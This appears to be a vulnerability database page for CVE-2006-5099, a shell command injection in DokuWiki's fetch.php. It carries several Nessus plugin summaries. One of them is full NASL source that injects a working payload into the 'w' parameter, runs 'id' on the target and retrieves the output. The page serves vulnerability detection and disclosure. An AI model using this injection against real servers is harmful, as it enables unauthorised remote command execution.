Vulnerabilities > CVE-2006-5099 - Remote Security vulnerability in Andreas Gohr Dokuwiki Release20060305/Release20060309/Release20060309E
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
lib/exec/fetch.php in DokuWiki before 2006-03-09e, when conf[imconvert] is configured to use ImageMagick, allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) w and (2) h parameters, which are not filtered when invoking convert.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 3 |
Nessus
NASL family CGI abuses NASL id DOKUWIKI_FETCH_CMD_EXEC.NASL description The remote host is running DokuWiki, an open source wiki application written in PHP. The installed version of DokuWiki fails to properly sanitize input to the last seen 2020-06-01 modified 2020-06-02 plugin id 22475 published 2006-09-29 reporter This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/22475 title DokuWiki fetch.php Multiple Parameter imconvert Function Arbitrary Command Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(22475); script_version("1.20"); script_cvs_date("Date: 2018/06/13 18:56:26"); script_cve_id("CVE-2006-5098", "CVE-2006-5099"); script_bugtraq_id(20257); script_name(english:"DokuWiki fetch.php Multiple Parameter imconvert Function Arbitrary Command Execution"); script_summary(english:"Executes arbitrary command via DokuWiki im_convert Feature"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP script that is affected by multiple vulnerabilities." ); script_set_attribute(attribute:"description", value: "The remote host is running DokuWiki, an open source wiki application written in PHP. The installed version of DokuWiki fails to properly sanitize input to the 'w' and 'h' parameters of the 'lib/exe/fetch.php' script before using it to execute a command when resizing images. An unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id. In addition, the application reportedly does not limit the size of images when resizing them, which can be exploited to churn through CPU cycles and disk space on the affected host. Note that successful exploitation of this issue requires that DokuWiki's 'imconvert' configuration option be set; by default, it is not." ); script_set_attribute(attribute:"see_also", value:"http://bugs.splitbrain.org/?do=details&id=924"); script_set_attribute(attribute:"see_also", value:"http://bugs.splitbrain.org/?do=details&id=926" ); script_set_attribute(attribute:"see_also", value:"http://www.freelists.org/archives/dokuwiki/09-2006/msg00278.html" ); script_set_attribute(attribute:"solution", value:"Upgrade to DokuWiki release 2006-03-09e / 2006-09-28 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/26"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/29"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:andreas_gohr:dokuwiki"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_DESTRUCTIVE_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("dokuwiki_detect.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/dokuwiki"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("data_protection.inc"); port = get_http_port(default:80, php:1); # Test an install. i = get_install_from_kb(appname: "dokuwiki", port: port, exit_on_fail: 1); dir = i['dir']; # Try to exploit the flaw to run a command. cmd = "id"; fname = string(SCRIPT_NAME, "-", unixtime(), ".html"); u = string( dir, "/lib/exe/fetch.php?", "media=wiki:dokuwiki-128.png&", "w=1;", cmd, ">../../data/cache/", fname, ";exit;" ); r = http_send_recv3(port:port, method: "GET", item: u, exit_on_fail: 1); # If it looks like the exploit was successful... if (" bad permissions?" >< r[2]) { # Retrieve the output of the command. u = string(dir, "/data/cache/", fname); r = http_send_recv3(port: port, method: "GET", item: u, exit_on_fail: 1); # There's a problem if the output looks like it's from id. if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string: r[2])) { if (report_verbosity) report = strcat('\nNessus was able to execute the command \'', cmd, '\' on the remote host\n', 'which produced the following output :\n\n', data_protection::sanitize_uid(output:r[2]) ); else report = NULL; security_hole(port:port, extra: report); exit(0); } }NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-200609-20.NASL description The remote host is affected by the vulnerability described in GLSA-200609-20 (DokuWiki: Shell command injection and Denial of Service) Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. Impact : A remote attacker could exploit the flaws to execute arbitrary shell commands with the rights of the web server daemon or cause a Denial of Service. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 22471 published 2006-09-29 reporter This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/22471 title GLSA-200609-20 : DokuWiki: Shell command injection and Denial of Service NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_450B76EE506811DBA5AE00508D6A62DF.NASL description Secunia reports : Some vulnerabilities have been reported in DokuWiki, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Input passed to the last seen 2020-06-01 modified 2020-06-02 plugin id 22489 published 2006-10-02 reporter This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/22489 title FreeBSD : dokuwiki -- multiple vulnerabilities (450b76ee-5068-11db-a5ae-00508d6a62df)